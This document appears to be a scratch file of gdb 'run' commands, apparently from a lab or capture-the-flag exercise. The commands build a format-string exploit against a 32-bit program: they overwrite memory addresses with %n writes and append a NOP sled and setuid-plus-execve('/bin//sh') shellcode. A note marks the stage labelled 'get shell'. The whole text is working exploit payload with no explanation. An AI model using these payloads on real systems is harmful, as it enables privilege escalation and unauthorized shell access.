run $(python -c 'print "\xfc\x96\x04\x08\xfd\x96\x04\x08\xfe\x96\x04\x08\xff\x96\x04\x08"')%9\$206x%9\$n%9\$226x%10\$n%9\$237x%11\$n%9\$49x%12\$n

run $(python -c 'print "\xf8\x96\x04\x08\xf9\x96\x04\x08\xfa\x96\x04\x08\xfb\x96\x04\x08"')%9\$206x%9\$n%9\$226x%10\$n%9\$237x%11\$n%9\$49x%12\$n$(python -c 'print"\x90"*100 + "B" * 20')

run `python -c 'print"\xf8\x96\x04\x08\xf9\x96\x04\x08\xfa\x96\x04\x08\xfb\x96\x04\x08"'`%9\$152x%9\$n%9\$43x%10\$n%9\$44x%11\$n%9\$256x%12\$n`python -c 'print "\x90"*100 + "B" * 20'`

*** (return bad address)
run $(python -c 'print "\xf8\x96\x04\x08\xf9\x96\x04\x08\xfa\x96\x04\x08\xfb\x96\x04\x08"')%9\$136x%9\$n%9\$59x%10\$n%9\$44x%11\$n%9\$256x%12\$n$(python -c 'print "\x90"*100 + "\x31\xc0\x31\xdb\x29\xc9\x89\xca\xb0\x46\xcd\x80\x29\xc0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x54\x89\xel\xb0\x0b\xcd\x80" ')

*** get shell 
run $(python -c 'print "\xf8\x96\x04\x08\xf9\x96\x04\x08\xfa\x96\x04\x08\xfb\x96\x04\x08"')%9\$136x%9\$n%9\$59x%10\$n%9\$44x%11\$n%9\$256x%12\$n$(python -c 'print "\x90"*101 + "\x31\xc0\x31\xdb\x29\xc9\x89\xca\xb0\x46\xcd\x80\x29\xc0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x54\x89\xe1\xb0\x0b\xcd\x80"')

run `python -c 'print "\xf8\x96\x04\x08\xf9\x96\x04\x08\xfa\x96\x04\x08\xfb\x96\x04\x08"'`%9\$136x%9\$n%9\$59x%10\$n%9\$44x%11\$n%9\$256x%12\$n`python -c 'print "\x90"*100 +"\x31\xc0\x31\xdb\x29\xc9\x89\xca\xb0\x46\xcd\x80\x29\xc0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x54\x89\xe1\xb0\x0b\xcd\x80"'`
